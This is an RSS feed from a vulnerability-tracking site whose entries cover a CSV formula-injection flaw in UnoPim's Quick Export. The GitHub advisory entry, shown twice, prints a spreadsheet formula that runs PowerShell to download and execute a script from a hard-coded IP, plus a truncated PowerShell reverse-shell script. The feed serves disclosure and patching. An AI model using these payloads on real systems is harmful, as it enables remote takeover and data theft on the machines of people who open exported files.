<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Tue, 06 Oct 2026 00:48:45 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-250486</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-250486</link>
      <description>EUVD-2026-250486</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-250486</guid>
    </item>
    <item>
      <title>fkie_cve-2025-55745</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2025-55745</link>
      <description>&lt;p&gt;UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Versions 0.3.0 and prior are vulnerable to CSV injection, also known as formula injection, in the Quick Export feature. This vulnerability allows attackers to inject malicious content into exported CSV files. When the CSV file is opened in spreadsheet applications such as Microsoft Excel, the malicious input may be interpreted as a formula or command, potentially resulting in the execution of arbitrary code on the victim&amp;#39;s device. Successful exploitation can lead to remote code execution, including the establishment of a reverse shell. Users are advised to upgrade to version 0.3.1 or later.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Versions 0.3.0 and prior are vulnerable to CSV injection, also known as formula injection, in the Quick Export feature. This vulnerability allows attackers to inject malicious content into exported CSV files. When the CSV file is opened in spreadsheet applications such as Microsoft Excel, the malicious input may be interpreted as a formula or command, potentially resulting in the execution of arbitrary code on the victim&amp;#39;s device. Successful exploitation can lead to remote code execution, including the establishment of a reverse shell. Users are advised to upgrade to version 0.3.1 or later.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2025-55745</guid>
    </item>
    <item>
      <title>GHSA-74rg-6f92-g6wx — UnoPim has CSV Injection on Quick Export feature</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-74rg-6f92-g6wx</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Packagist: unopim/unopim&lt;/p&gt;
&lt;p&gt;### Summary
Description:
`CSV Injection` or `Formula Injection` is a security vulnerability that occurs when malicious content is inserted into a CSV (Comma-Separated Values) file, which is then opened in a spreadsheet application like Microsoft Excel. This attack exploits the way spreadsheet software automatically interprets certain text patterns as formulas or commands, rather than plain text.&lt;/p&gt;
&lt;p&gt;### Details
A basic test for CSV Injection is using `SUM()` to add two numbers or open calc.exe​ using​
command:
 `=cmd|&amp;#39; /C calc&amp;#39;!A0​`&lt;/p&gt;
&lt;p&gt;The same method can be used to run arbitrary code on the victim&amp;#39;s machine.
For example the below code will download and execute a malicious script to create a reverse TCP connection to the attacker&amp;#39;s machine.
*Payload*:
&amp;gt; This is our payload and will be used in the vulnerable field during exploitation
```
    =cmd|&amp;#39; /C powershell Invoke-WebRequest
    &amp;#34;http://52.172.182.242:7000/shell.ps1&amp;#34; -OutFile &amp;#34;$env:Temp\shell.ps1&amp;#34;;
    powershell -ExecutionPolicy Bypass -File &amp;#34;$env:Temp\shell.ps1&amp;#34;&amp;#39;!A1​
```&lt;/p&gt;
&lt;p&gt;*shell.ps1*:
```
    $client = New-Object System.Net.Sockets.TCPClient(&amp;#39;52.172.182.242&amp;#39;,8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex &amp;#34;. { $data } 2&amp;gt;&amp;amp;1&amp;#34; | Out-String ); $sendback2 = $sendback + &amp;#39;PS &amp;#39; + (pwd).Path + &amp;#39;&amp;gt; &amp;#39;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$s…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Packagist: unopim/unopim&lt;/p&gt;
&lt;p&gt;### Summary
Description:
`CSV Injection` or `Formula Injection` is a security vulnerability that occurs when malicious content is inserted into a CSV (Comma-Separated Values) file, which is then opened in a spreadsheet application like Microsoft Excel. This attack exploits the way spreadsheet software automatically interprets certain text patterns as formulas or commands, rather than plain text.&lt;/p&gt;
&lt;p&gt;### Details
A basic test for CSV Injection is using `SUM()` to add two numbers or open calc.exe​ using​
command:
 `=cmd|&amp;#39; /C calc&amp;#39;!A0​`&lt;/p&gt;
&lt;p&gt;The same method can be used to run arbitrary code on the victim&amp;#39;s machine.
For example the below code will download and execute a malicious script to create a reverse TCP connection to the attacker&amp;#39;s machine.
*Payload*:
&amp;gt; This is our payload and will be used in the vulnerable field during exploitation
```
    =cmd|&amp;#39; /C powershell Invoke-WebRequest
    &amp;#34;http://52.172.182.242:7000/shell.ps1&amp;#34; -OutFile &amp;#34;$env:Temp\shell.ps1&amp;#34;;
    powershell -ExecutionPolicy Bypass -File &amp;#34;$env:Temp\shell.ps1&amp;#34;&amp;#39;!A1​
```&lt;/p&gt;
&lt;p&gt;*shell.ps1*:
```
    $client = New-Object System.Net.Sockets.TCPClient(&amp;#39;52.172.182.242&amp;#39;,8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex &amp;#34;. { $data } 2&amp;gt;&amp;amp;1&amp;#34; | Out-String ); $sendback2 = $sendback + &amp;#39;PS &amp;#39; + (pwd).Path + &amp;#39;&amp;gt; &amp;#39;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$s…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-74rg-6f92-g6wx</guid>
    </item>
  </channel>
</rss>
